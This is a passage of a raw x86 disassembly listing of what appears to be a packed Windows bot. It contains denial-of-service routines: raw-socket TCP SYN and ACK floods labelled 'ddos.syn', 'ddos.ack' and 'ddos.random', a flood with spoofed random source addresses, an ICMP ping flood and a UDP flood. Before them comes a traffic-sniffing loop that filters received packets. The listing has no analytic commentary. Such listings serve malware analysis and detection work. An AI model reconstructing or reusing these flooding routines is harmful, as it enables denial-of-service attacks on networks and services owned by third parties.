sub_412661+15Cj lea eax, [ebp+var_2B8] push eax call sub_4151AD pop ecx push edi call ds:dword_4CB6EC ; closesocket push [ebp+var_34] call sub_40B413 pop ecx push ebx call dword_4270CC ; ExitThread loc_412803: ; CODE XREF: sub_412661+13Cj mov esi, 200h loc_412808: ; CODE XREF: sub_412661+1D6j ; sub_412661+1FBj ... mov edi, 0FFFFh lea eax, [ebp+var_113B8] push edi push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_113B8] push ebx push edi push eax push [ebp+var_10] call ds:dword_4CB66C ; recv cmp [ebp+var_113AF], 6 jnz short loc_412808 push [ebp+var_113A4] mov edi, dword_4271E4 call edi ; htons push [ebp+var_113A4+2] movzx eax, ax mov [ebp+arg_0], eax call edi ; htons cmp [ebp+arg_0], 6Eh movzx edi, ax jz short loc_412808 cmp [ebp+arg_0], 19h jz short loc_412808 cmp edi, 6Eh jz short loc_412808 cmp edi, 19h jz short loc_412808 push [ebp+var_113AC] call sub_412352 pop ecx push dword ptr [eax] call dword_4271E8 ; inet_ntoa push eax lea eax, [ebp+var_13B8] push offset aS_2 ; "%s" push eax call sub_41B886 push [ebp+var_113A8] call sub_412352 add esp, 10h push dword ptr [eax] call dword_4271E8 ; inet_ntoa push eax lea eax, [ebp+var_BB8] push offset aS_2 ; "%s" push eax call sub_41B886 lea eax, [ebp+var_1138C] mov [ebp+var_4], ebx push eax call sub_41AFE0 add esp, 10h test eax, eax jle short loc_412906 loc_4128D2: ; CODE XREF: sub_412661+2A3j mov eax, [ebp+var_4] cmp [ebp+eax+var_1138C], 0Dh lea eax, [ebp+eax+var_1138C] jnz short loc_4128E9 mov byte ptr [eax], 20h loc_4128E9: ; CODE XREF: sub_412661+283j cmp byte ptr [eax], 0Ah jnz short loc_4128F1 mov byte ptr [eax], 20h loc_4128F1: ; CODE XREF: sub_412661+28Bj inc [ebp+var_4] lea eax, [ebp+var_1138C] push eax call sub_41AFE0 cmp [ebp+var_4], eax pop ecx jl short loc_4128D2 loc_412906: ; CODE XREF: sub_412661+26Fj cmp [ebp+arg_0], 50h jz loc_4129B9 cmp edi, 50h jz loc_4129B9 lea eax, [ebp+var_1138C] push eax call sub_412361 test al, al pop ecx jz short loc_41294D lea eax, [ebp+var_1138C] push eax lea eax, [ebp+var_BB8] push edi push eax push [ebp+arg_0] lea eax, [ebp+var_13B8] push eax push offset unk_43615C jmp loc_4129E8 ; --------------------------------------------------------------------------- loc_41294D: ; CODE XREF: sub_412661+2C7j cmp edi, 50h jz short loc_4129B9 lea eax, [ebp+var_1138C] push eax call sub_412478 test al, al pop ecx jz short loc_412983 lea eax, [ebp+var_1138C] push eax lea eax, [ebp+var_BB8] push edi push eax push [ebp+arg_0] lea eax, [ebp+var_13B8] push eax push offset unk_436128 jmp short loc_4129E8 ; --------------------------------------------------------------------------- loc_412983: ; CODE XREF: sub_412661+300j cmp edi, 50h jz short loc_4129B9 lea eax, [ebp+var_1138C] push eax call sub_4124EE test al, al pop ecx jz short loc_4129B9 lea eax, [ebp+var_1138C] push eax lea eax, [ebp+var_BB8] push edi push eax push [ebp+arg_0] lea eax, [ebp+var_13B8] push eax push offset unk_4360F4 jmp short loc_4129E8 ; --------------------------------------------------------------------------- loc_4129B9: ; CODE XREF: sub_412661+2A9j ; sub_412661+2B2j ... lea eax, [ebp+var_1138C] push eax call sub_412575 test al, al pop ecx lea eax, [ebp+var_1138C] push eax jz short loc_412A26 lea eax, [ebp+var_BB8] push edi push eax lea eax, [ebp+var_13B8] push [ebp+arg_0] push eax push offset unk_4360BC loc_4129E8: ; CODE XREF: sub_412661+2E7j ; sub_412661+320j ... lea eax, [ebp+var_2B8] push esi push eax call sub_41B980 add esp, 20h cmp [ebp+var_2C], ebx jnz loc_412808 push ebx lea eax, [ebp+var_2B8] push [ebp+var_30] push eax lea eax, [ebp+var_B4] push eax push [ebp+var_B8] call sub_409A73 add esp, 14h jmp loc_412808 ; --------------------------------------------------------------------------- loc_412A26: ; CODE XREF: sub_412661+36Ej call sub_4125FC test al, al pop ecx jz loc_412808 lea eax, [ebp+var_1138C] push eax lea eax, [ebp+var_BB8] push edi push eax push [ebp+arg_0] lea eax, [ebp+var_13B8] push eax push offset unk_436084 jmp short loc_4129E8 sub_412661 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_412A54 proc near ; DATA XREF: sub_401ACD+6543o var_494 = byte ptr -494h var_294 = dword ptr -294h var_290 = dword ptr -290h var_28C = byte ptr -28Ch var_20C = byte ptr -20Ch var_18C = byte ptr -18Ch var_10C = byte ptr -10Ch var_8C = byte ptr -8Ch var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 494h mov eax, [ebp+arg_0] push esi push edi mov ecx, 0A5h mov esi, eax lea edi, [ebp+var_294] rep movsd mov dword ptr [eax+290h], 1 call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 lea eax, [ebp+var_18C] push eax lea eax, [ebp+var_8C] push eax lea eax, [ebp+var_20C] push eax lea eax, [ebp+var_28C] push eax call sub_412E40 add esp, 14h push eax lea eax, [ebp+var_494] push offset unk_4361EC push eax call sub_41B886 xor esi, esi add esp, 0Ch cmp [ebp+var_8], esi jnz short loc_412AE7 push esi lea eax, [ebp+var_494] push [ebp+var_C] push eax lea eax, [ebp+var_10C] push eax push [ebp+var_294] call sub_409A73 add esp, 14h loc_412AE7: ; CODE XREF: sub_412A54+71j lea eax, [ebp+var_494] push eax call sub_4151AD push [ebp+var_290] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread pop edi pop esi sub_412A54 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_412B09 proc near ; CODE XREF: sub_412E40+40p var_284 = byte ptr -284h var_F4 = byte ptr -0F4h var_B4 = byte ptr -0B4h var_B3 = byte ptr -0B3h var_A0 = byte ptr -0A0h var_94 = byte ptr -94h var_8C = byte ptr -8Ch var_78 = dword ptr -78h var_74 = dword ptr -74h var_70 = byte ptr -70h var_6F = byte ptr -6Fh var_6E = word ptr -6Eh var_58 = word ptr -58h var_56 = word ptr -56h var_54 = dword ptr -54h var_48 = dword ptr -48h var_44 = dword ptr -44h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_34 = byte ptr -34h var_32 = word ptr -32h var_30 = word ptr -30h var_2E = word ptr -2Eh var_2C = byte ptr -2Ch var_2B = byte ptr -2Bh var_2A = word ptr -2Ah var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_14 = word ptr -14h var_12 = word ptr -12h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = byte ptr -8 var_7 = byte ptr -7 var_6 = word ptr -6 var_4 = word ptr -4 var_2 = word ptr -2 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 284h push ebx push edi push 0Eh xor ebx, ebx pop ecx xor eax, eax lea edi, [ebp+var_B3] mov [ebp+var_B4], bl rep stosd stosw stosb lea eax, [ebp+var_284] push eax push 202h call ds:dword_4CB5C4 ; WSAStartup test eax, eax jz short loc_412B49 xor eax, eax jmp loc_412E3C ; --------------------------------------------------------------------------- loc_412B49: ; CODE XREF: sub_412B09+37j push 1 pop edi push edi push ebx push ebx push 0FFh push 3 push 2 call ds:dword_4CB6F8 ; WSASocketA cmp eax, 0FFFFFFFFh mov [ebp+var_20], eax jz loc_412E34 push esi lea ecx, [ebp+var_40] push 4 push ecx push 2 push ebx push eax mov [ebp+var_40], edi call ds:dword_4CB634 ; setsockopt cmp eax, 0FFFFFFFFh jz loc_412E2A push [ebp+arg_C] mov [ebp+var_58], 2 call ds:dword_4CB654 ; htons mov esi, [ebp+arg_0] push 28h mov [ebp+var_56], ax mov [ebp+var_54], esi mov [ebp+var_34], 45h call ds:dword_4CB654 ; htons push [ebp+arg_C] mov [ebp+var_32], ax mov [ebp+var_30], di mov [ebp+var_2E], bx mov [ebp+var_2C], 80h mov [ebp+var_2B], 6 mov [ebp+var_2A], bx mov [ebp+var_24], esi call ds:dword_4CB654 ; htons mov [ebp+var_12], ax call sub_41B8E2 movzx eax, ax cdq mov ecx, 401h idiv ecx push edx call ds:dword_4CB654 ; htons push 12345678h mov [ebp+var_14], ax call ds:dword_4CB650 ; htonl push offset aDdos_syn ; "ddos.syn" mov [ebp+var_10], eax push [ebp+arg_8] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_412C19 mov [ebp+var_C], ebx mov [ebp+var_7], 2 jmp short loc_412C6D ; --------------------------------------------------------------------------- loc_412C19: ; CODE XREF: sub_412B09+105j push offset aDdos_ack ; "ddos.ack" push [ebp+arg_8] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_412C35 mov [ebp+var_C], ebx mov [ebp+var_7], 10h jmp short loc_412C6D ; --------------------------------------------------------------------------- loc_412C35: ; CODE XREF: sub_412B09+121j push offset aDdos_random ; "ddos.random" push [ebp+arg_8] call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_412C6D call sub_41B8E2 push 3 cdq pop ecx idiv ecx mov [ebp+var_C], edx call sub_41B8E2 push 2 cdq pop ecx idiv ecx neg edx sbb dl, dl and dl, 0Eh add dl, cl mov [ebp+var_7], dl loc_412C6D: ; CODE XREF: sub_412B09+10Ej ; sub_412B09+12Aj ... push 4000h mov [ebp+var_8], 50h call ds:dword_4CB654 ; htons mov [ebp+var_6], ax lea eax, [ebp+var_48] push eax mov [ebp+var_2], bx mov [ebp+arg_8], ebx call dword_427134 ; QueryPerformanceFrequency lea eax, [ebp+var_1C] push eax call dword_427130 ; QueryPerformanceCounter push [ebp+var_44] mov eax, [ebp+arg_10] cdq push [ebp+var_48] push edx push eax call sub_41D280 add eax, [ebp+var_1C] push 14h pop esi adc edx, [ebp+var_18] mov [ebp+var_3C], eax mov [ebp+var_38], edx loc_412CBB: ; CODE XREF: sub_412B09+2E2j ; sub_412B09+2F0j mov [ebp+var_4], bx call sub_41B8E2 cdq mov ecx, 3E9h idiv ecx add edx, 3E8h push edx call ds:dword_4CB654 ; htons mov [ebp+var_14], ax call sub_41B8E2 mov edi, eax shl edi, 10h call sub_41B8E2 or edi, eax push edi call ds:dword_4CB654 ; htons movzx eax, ax mov [ebp+var_10], eax mov eax, [ebp+arg_4] inc [ebp+arg_4] push eax call ds:dword_4CB650 ; htonl mov [ebp+var_28], eax mov eax, [ebp+var_24] push esi mov [ebp+var_74], eax mov [ebp+var_70], bl mov [ebp+var_6F], 6 call ds:dword_4CB654 ; htons mov [ebp+var_6E], ax mov eax, [ebp+var_28] mov [ebp+var_78], eax lea eax, [ebp+var_78] push 20h push eax lea eax, [ebp+var_B4] push eax call sub_41C310 lea eax, [ebp+var_14] push esi push eax lea eax, [ebp+var_94] push eax call sub_41C310 lea eax, [ebp+var_B4] push 34h push eax call sub_40AC69 mov [ebp+var_4], ax lea eax, [ebp+var_34] push esi push eax lea eax, [ebp+var_B4] push eax call sub_41C310 lea eax, [ebp+var_14] push esi push eax lea eax, [ebp+var_A0] push eax call sub_41C310 push 4 lea eax, [ebp+var_8C] push ebx push eax call sub_41B590 add esp, 44h lea eax, [ebp+var_B4] push 28h push eax call sub_40AC69 mov [ebp+var_2A], ax lea eax, [ebp+var_34] push esi push eax lea eax, [ebp+var_B4] push eax call sub_41C310 add esp, 14h lea eax, [ebp+var_58] push 10h push eax push ebx lea eax, [ebp+var_B4] push 28h push eax push [ebp+var_20] call ds:dword_4CB6B8 ; sendto cmp eax, 0FFFFFFFFh jz short loc_412DFE add [ebp+arg_8], eax lea eax, [ebp+var_1C] push eax call dword_427130 ; QueryPerformanceCounter mov eax, [ebp+var_18] cmp eax, [ebp+var_38] jg short loc_412E27 jl loc_412CBB mov eax, [ebp+var_1C] cmp eax, [ebp+var_3C] jnb short loc_412E27 jmp loc_412CBB ; --------------------------------------------------------------------------- loc_412DFE: ; CODE XREF: sub_412B09+2CBj call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_F4] push offset dword_436214 push eax call sub_41B886 lea eax, [ebp+var_F4] push eax call sub_4151AD add esp, 10h jmp short loc_412E2A ; --------------------------------------------------------------------------- loc_412E27: ; CODE XREF: sub_412B09+2E0j ; sub_412B09+2EEj mov ebx, [ebp+arg_8] loc_412E2A: ; CODE XREF: sub_412B09+78j ; sub_412B09+31Cj push [ebp+var_20] call ds:dword_4CB6EC ; closesocket pop esi loc_412E34: ; CODE XREF: sub_412B09+5Bj call ds:dword_4CB5AC ; WSACleanup mov eax, ebx loc_412E3C: ; CODE XREF: sub_412B09+3Bj pop edi pop ebx leave retn sub_412B09 endp ; =============== S U B R O U T I N E ======================================= sub_412E40 proc near ; CODE XREF: sub_412A54+4Fp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch arg_C = dword ptr 10h push ebx push esi push edi push [esp+0Ch+arg_0] call sub_40AAFA push [esp+10h+arg_4] mov esi, eax call sub_41B779 push [esp+14h+arg_C] mov ebx, eax call sub_41B779 mov edi, eax call sub_41B8E2 cdq mov ecx, 200h push edi idiv ecx push ebx push [esp+20h+arg_8] lea eax, [edx+esi+100h] push eax push esi call sub_412B09 add esp, 20h test eax, eax jnz short loc_412E8F push 1 pop eax loc_412E8F: ; CODE XREF: sub_412E40+4Aj cdq mov ecx, 3E8h idiv ecx cdq idiv edi pop edi pop esi pop ebx retn sub_412E40 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_412E9E proc near ; DATA XREF: sub_401ACD+6722o var_3BC = byte ptr -3BCh var_1BC = dword ptr -1BCh var_1B8 = byte ptr -1B8h var_138 = byte ptr -138h var_B8 = byte ptr -0B8h var_38 = dword ptr -38h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_1C = word ptr -1Ch var_1A = word ptr -1Ah var_18 = dword ptr -18h var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 3BCh push ebx push esi mov eax, [ebp+arg_0] push edi push 68h mov esi, eax pop ecx lea edi, [ebp+var_1BC] push 1 pop ebx push 0FFh push 3 rep movsd push 2 mov [eax+19Ch], ebx call ds:dword_4CB6D4 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_412F39 call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_3BC] push offset unk_436314 push eax call sub_41B886 xor edi, edi add esp, 0Ch cmp [ebp+var_24], edi jnz short loc_412F1C push edi lea eax, [ebp+var_3BC] push [ebp+var_28] push eax lea eax, [ebp+var_B8] push eax push [ebp+var_1BC] call sub_409A73 add esp, 14h loc_412F1C: ; CODE XREF: sub_412E9E+5Cj lea eax, [ebp+var_3BC] push eax call sub_4151AD push [ebp+var_38] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread loc_412F39: ; CODE XREF: sub_412E9E+3Aj lea ecx, [ebp+var_C] push 4 push ecx xor edi, edi push 2 push edi push eax mov [ebp+var_C], ebx call ds:dword_4CB634 ; setsockopt loc_412F4E: ; DATA XREF: UPX0:off_43A86Co cmp eax, 0FFFFFFFFh jnz short loc_412FB0 call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_3BC] push offset unk_4362E4 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_24], edi jnz short loc_412F93 push edi lea eax, [ebp+var_3BC] push [ebp+var_28] push eax lea eax, [ebp+var_B8] push eax push [ebp+var_1BC] call sub_409A73 add esp, 14h loc_412F93: ; CODE XREF: sub_412E9E+D3j lea eax, [ebp+var_3BC] push eax call sub_4151AD push [ebp+var_38] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread loc_412FB0: ; CODE XREF: sub_412E9E+B3j lea eax, [ebp+var_1B8] push eax call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh jnz short loc_413017 lea eax, [ebp+var_3BC] push offset unk_4362C4 push eax call sub_41B886 cmp [ebp+var_24], edi pop ecx pop ecx jnz short loc_412FFA push edi lea eax, [ebp+var_3BC] push [ebp+var_28] push eax lea eax, [ebp+var_B8] push eax push [ebp+var_1BC] call sub_409A73 add esp, 14h loc_412FFA: ; CODE XREF: sub_412E9E+13Aj lea eax, [ebp+var_3BC] push eax call sub_4151AD push [ebp+var_38] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread loc_413017: ; CODE XREF: sub_412E9E+122j push 10h lea eax, [ebp+var_1C] push edi push eax call sub_41B590 add esp, 0Ch mov [ebp+var_1C], 2 push edi call ds:dword_4CB654 ; htons mov [ebp+var_1A], ax lea eax, [ebp+var_1B8] push eax call ds:dword_4CB694 ; inet_addr mov esi, dword_4270A8 mov [ebp+var_18], eax mov [ebp+arg_0], edi call esi ; GetTickCount mov [ebp+var_8], eax loc_413055: ; CODE XREF: sub_412E9E+2E8j call esi ; GetTickCount sub eax, [ebp+var_8] xor edx, edx mov ecx, 3E8h div ecx cmp eax, [ebp+var_30] ja loc_413200 push 41Ch mov ds:byte_4CE3C8, 45h call ds:dword_4CB654 ; htons cmp [ebp+var_2C], edi mov ds:word_4CE3CA, ax mov ds:word_4CE3CC, bx mov ds:word_4CE3CE, di mov ds:byte_4CE3D0, 80h mov ds:byte_4CE3D1, bl mov ds:word_4CE3D2, di jz short loc_4130DB call sub_41B8E2 mov ebx, eax shl ebx, 8 call sub_41B8E2 add ebx, eax shl ebx, 8 call sub_41B8E2 add ebx, eax shl ebx, 8 call sub_41B8E2 add ebx, eax push 1 mov ds:dword_4CE3D4, ebx pop ebx jmp short loc_4130F3 ; --------------------------------------------------------------------------- loc_4130DB: ; CODE XREF: sub_412E9E+20Bj push [ebp+var_1BC] call sub_40AC10 pop ecx push eax call ds:dword_4CB694 ; inet_addr mov ds:dword_4CE3D4, eax loc_4130F3: ; CODE XREF: sub_412E9E+23Bj mov eax, [ebp+var_18] mov ds:dword_4CE3D8, eax call sub_41B8E2 cdq mov ecx, 100h idiv ecx mov ds:byte_4CE3DC, dl call sub_41B8E2 cdq mov ecx, 100h idiv ecx mov ds:byte_4CE3DD, dl call sub_41B8E2 cdq mov ecx, 0F0h push 400h idiv ecx mov ds:word_4CE3DE, di mov ds:word_4CE3E2, bx inc edx mov ds:word_4CE3E0, dx call sub_41B8E2 cdq mov ecx, 0FFh idiv ecx push edx push offset dword_4CE3E4 call sub_41B590 add esp, 0Ch lea eax, [ebp+var_1C] push 10h push eax push edi push 41Ch push offset byte_4CE3C8 push [ebp+var_4] call ds:dword_4CB6B8 ; sendto cmp eax, 0FFFFFFFFh jz short loc_41318B inc [ebp+arg_0] jmp loc_413055 ; --------------------------------------------------------------------------- loc_41318B: ; CODE XREF: sub_412E9E+2E3j push [ebp+var_4] call ds:dword_4CB6EC ; closesocket call ds:dword_4CB5E8 ; WSAGetLastError push eax lea eax, [ebp+var_1B8] push [ebp+arg_0] push eax push offset unk_43627C lea eax, [ebp+var_3BC] push 200h push eax call sub_41B980 add esp, 18h cmp [ebp+var_24], edi jnz short loc_4131E3 push edi lea eax, [ebp+var_3BC] push [ebp+var_28] push eax lea eax, [ebp+var_B8] push eax push [ebp+var_1BC] call sub_409A73 add esp, 14h loc_4131E3: ; CODE XREF: sub_412E9E+323j lea eax, [ebp+var_3BC] push eax call sub_4151AD push [ebp+var_38] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread loc_413200: ; CODE XREF: sub_412E9E+1C8j push [ebp+var_4] call ds:dword_4CB6EC ; closesocket mov eax, [ebp+arg_0] xor edx, edx imul eax, 3Ch mov ecx, eax shr eax, 0Ah div [ebp+var_30] shr ecx, 14h push ecx push eax lea eax, [ebp+var_1B8] push [ebp+arg_0] push eax lea eax, [ebp+var_138] push eax lea eax, [ebp+var_3BC] push offset unk_436230 push eax call sub_41B886 add esp, 1Ch cmp [ebp+var_24], edi jnz short loc_413268 push edi lea eax, [ebp+var_3BC] push [ebp+var_28] push eax lea eax, [ebp+var_B8] push eax push [ebp+var_1BC] call sub_409A73 add esp, 14h loc_413268: ; CODE XREF: sub_412E9E+3A8j lea eax, [ebp+var_3BC] push eax call sub_4151AD push [ebp+var_38] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread sub_412E9E endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_413285 proc near ; DATA XREF: sub_401ACD+5510o var_10320 = byte ptr -10320h var_344 = byte ptr -344h var_144 = dword ptr -144h var_140 = byte ptr -140h var_C0 = byte ptr -0C0h var_40 = dword ptr -40h var_3C = dword ptr -3Ch var_38 = dword ptr -38h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_20 = byte ptr -20h var_18 = dword ptr -18h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 10320h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi push 49h mov esi, eax pop ecx lea edi, [ebp+var_144] rep movsd push 1 pop edi mov [eax+120h], edi call ds:dword_4CB5DC ; IcmpCreateFile mov [ebp+arg_0], eax lea eax, [ebp+var_C0] push eax call ds:dword_4CB694 ; inet_addr mov esi, eax xor ebx, ebx xor eax, eax cmp esi, 0FFFFFFFFh jnz short loc_4132E0 lea eax, [ebp+var_C0] push eax call ds:dword_4CB6D8 ; gethostbyname cmp eax, ebx jz short loc_4132E6 loc_4132E0: ; CODE XREF: sub_413285+48j cmp [ebp+arg_0], 0FFFFFFFFh jnz short loc_413343 loc_4132E6: ; CODE XREF: sub_413285+59j lea eax, [ebp+var_C0] push eax lea eax, [ebp+var_344] push offset unk_43636C push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_28], ebx jnz short loc_413326 push ebx lea eax, [ebp+var_344] push [ebp+var_2C] push eax lea eax, [ebp+var_140] push eax push [ebp+var_144] call sub_409A73 add esp, 14h loc_413326: ; CODE XREF: sub_413285+7Fj lea eax, [ebp+var_344] push eax call sub_4151AD push [ebp+var_30] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread loc_413343: ; CODE XREF: sub_413285+5Fj cmp eax, ebx jz short loc_413353 mov eax, [eax+0Ch] mov eax, [eax] mov eax, [eax] mov [ebp+var_4], eax jmp short loc_413356 ; --------------------------------------------------------------------------- loc_413353: ; CODE XREF: sub_413285+C0j mov [ebp+var_4], esi loc_413356: ; CODE XREF: sub_413285+CCj push 1Ch lea eax, [ebp+var_20] push ebx push eax call sub_41B590 or [ebp+var_18], 0FFFFFFFFh mov eax, 0FFDCh add esp, 0Ch cmp [ebp+var_3C], eax jle short loc_413376 mov [ebp+var_3C], eax loc_413376: ; CODE XREF: sub_413285+ECj cmp [ebp+var_38], edi jge short loc_41337E mov [ebp+var_38], edi loc_41337E: ; CODE XREF: sub_413285+F4j xor esi, esi cmp [ebp+var_40], ebx jle short loc_4133AB loc_413385: ; CODE XREF: sub_413285+124j push [ebp+var_38] lea eax, [ebp+var_20] push 1Ch push eax push ebx lea eax, [ebp+var_10320] push [ebp+var_3C] push eax push [ebp+var_4] push [ebp+arg_0] call ds:dword_4CB56C ; IcmpSendEcho inc esi cmp esi, [ebp+var_40] jl short loc_413385 loc_4133AB: ; CODE XREF: sub_413285+FEj push [ebp+arg_0] call ds:dword_4CB70C ; IcmpCloseHandle lea eax, [ebp+var_C0] push eax lea eax, [ebp+var_344] push offset unk_436340 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_28], ebx jnz short loc_4133F4 push ebx lea eax, [ebp+var_344] push [ebp+var_2C] push eax lea eax, [ebp+var_140] push eax push [ebp+var_144] call sub_409A73 add esp, 14h loc_4133F4: ; CODE XREF: sub_413285+14Dj lea eax, [ebp+var_344] push eax call sub_4151AD push [ebp+var_30] call sub_40B413 pop ecx pop ecx push ebx call dword_4270CC ; ExitThread sub_413285 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_413411 proc near ; DATA XREF: sub_401ACD+575Co var_10312 = byte ptr -10312h var_10310 = byte ptr -10310h var_334 = byte ptr -334h var_134 = dword ptr -134h var_130 = byte ptr -130h var_B0 = byte ptr -0B0h var_30 = dword ptr -30h var_2C = dword ptr -2Ch var_28 = dword ptr -28h var_24 = dword ptr -24h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_18 = dword ptr -18h var_10 = word ptr -10h var_E = word ptr -0Eh var_C = dword ptr -0Ch arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 10310h call sub_41BB20 mov eax, [ebp+arg_0] push ebx push esi push edi push 49h mov esi, eax pop ecx lea edi, [ebp+var_134] rep movsd push 1 pop esi mov [eax+120h], esi call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx push 11h push 2 push 2 call ds:dword_4CB6D4 ; socket mov ebx, eax xor edi, edi push 10h lea eax, [ebp+var_10] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_B0] mov [ebp+var_10], 2 push eax call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh mov [ebp+arg_0], eax jnz short loc_4134F6 lea eax, [ebp+var_B0] push eax call ds:dword_4CB6D8 ; gethostbyname cmp eax, edi jnz short loc_4134EF lea eax, [ebp+var_B0] push eax lea eax, [ebp+var_334] push offset unk_4363C0 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_18], edi jnz short loc_4134D2 push edi lea eax, [ebp+var_334] push [ebp+var_1C] push eax lea eax, [ebp+var_130] push eax push [ebp+var_134] call sub_409A73 add esp, 14h loc_4134D2: ; CODE XREF: sub_413411+9Fj lea eax, [ebp+var_334] push eax call sub_4151AD push [ebp+var_20] call sub_40B413 pop ecx pop ecx push esi call dword_4270CC ; ExitThread loc_4134EF: ; CODE XREF: sub_413411+7Fj mov eax, [eax+0Ch] mov eax, [eax] jmp short loc_4134F9 ; --------------------------------------------------------------------------- loc_4134F6: ; CODE XREF: sub_413411+6Ej lea eax, [ebp+arg_0] loc_4134F9: ; CODE XREF: sub_413411+E3j mov eax, [eax] cmp [ebp+var_24], edi mov [ebp+var_C], eax jnz short loc_413514 call sub_41B8E2 cdq mov ecx, 0FFDCh idiv ecx inc edx push edx jmp short loc_413517 ; --------------------------------------------------------------------------- loc_413514: ; CODE XREF: sub_413411+F0j push [ebp+var_24] loc_413517: ; CODE XREF: sub_413411+101j call ds:dword_4CB654 ; htons cmp [ebp+var_24], esi mov [ebp+var_E], ax jge short loc_413529 mov [ebp+var_24], esi loc_413529: ; CODE XREF: sub_413411+113j mov eax, 0FFFFh cmp [ebp+var_24], eax jle short loc_413536 mov [ebp+var_24], eax loc_413536: ; CODE XREF: sub_413411+120j mov eax, [ebp+var_30] push 0Ah cdq pop ecx idiv ecx cmp [ebp+var_28], edi mov [ebp+var_30], eax jnz short loc_41354A mov [ebp+var_28], esi loc_41354A: ; CODE XREF: sub_413411+134j xor esi, esi cmp [ebp+var_2C], edi jle short loc_41356B loc_413551: ; CODE XREF: sub_413411+158j call sub_41B8E2 cdq mov ecx, 0FFh idiv ecx inc esi cmp esi, [ebp+var_2C] mov [ebp+esi-10311h], dl jl short loc_413551 loc_41356B: ; CODE XREF: sub_413411+13Ej ; sub_413411+19Cj ... mov eax, [ebp+var_30] dec [ebp+var_30] test eax, eax jle short loc_4135CA push 0Bh pop esi loc_413578: ; CODE XREF: sub_413411+197j lea eax, [ebp+var_10] push 10h push eax push edi call sub_41B8E2 push 0Ah cdq pop ecx idiv ecx mov eax, [ebp+var_2C] sub eax, edx push eax lea eax, [ebp+var_10310] push eax push ebx call ds:dword_4CB6B8 ; sendto push [ebp+var_28] call dword_427078 ; Sleep dec esi jnz short loc_413578 cmp [ebp+var_24], edi jnz short loc_41356B call sub_41B8E2 cdq mov ecx, 0FFDCh idiv ecx inc edx push edx call ds:dword_4CB654 ; htons mov [ebp+var_E], ax jmp short loc_41356B ; --------------------------------------------------------------------------- loc_4135CA: ; CODE XREF: sub_413411+162j lea eax, [ebp+var_B0] push eax lea eax, [ebp+var_334] push offset unk_436394 push eax call sub_41B886 add esp, 0Ch cmp [ebp+var_18], edi jnz short loc_41360A push edi lea eax, [ebp+var_334] push [ebp+var_1C] push eax lea eax, [ebp+var_130] push eax push [ebp+var_134] call sub_409A73 add esp, 14h loc_41360A: ; CODE XREF: sub_413411+1D7j lea eax, [ebp+var_334] push eax call sub_4151AD push [ebp+var_20] call sub_40B413 pop ecx pop ecx push edi call dword_4270CC ; ExitThread sub_413411 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_413627 proc near ; DATA XREF: sub_401ACD+4DEDo var_414 = byte ptr -414h var_214 = dword ptr -214h var_210 = byte ptr -210h var_190 = byte ptr -190h var_110 = byte ptr -110h var_90 = byte ptr -90h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_8 = dword ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 414h mov eax, [ebp+arg_0] push esi push edi mov ecx, 85h mov esi, eax lea edi, [ebp+var_214] rep movsd mov dword ptr [eax+210h], 1 lea eax, [ebp+var_110] push eax lea eax, [ebp+var_190] push eax lea eax, [ebp+var_210] push eax call sub_413788 add esp, 0Ch push eax lea eax, [ebp+var_414] push offset dword_4363E8 push eax call sub_41B886 xor esi, esi add esp, 0Ch cmp [ebp+var_8], esi jnz short loc_4136A7 push esi lea eax, [ebp+var_414] push [ebp+var_C] push eax lea 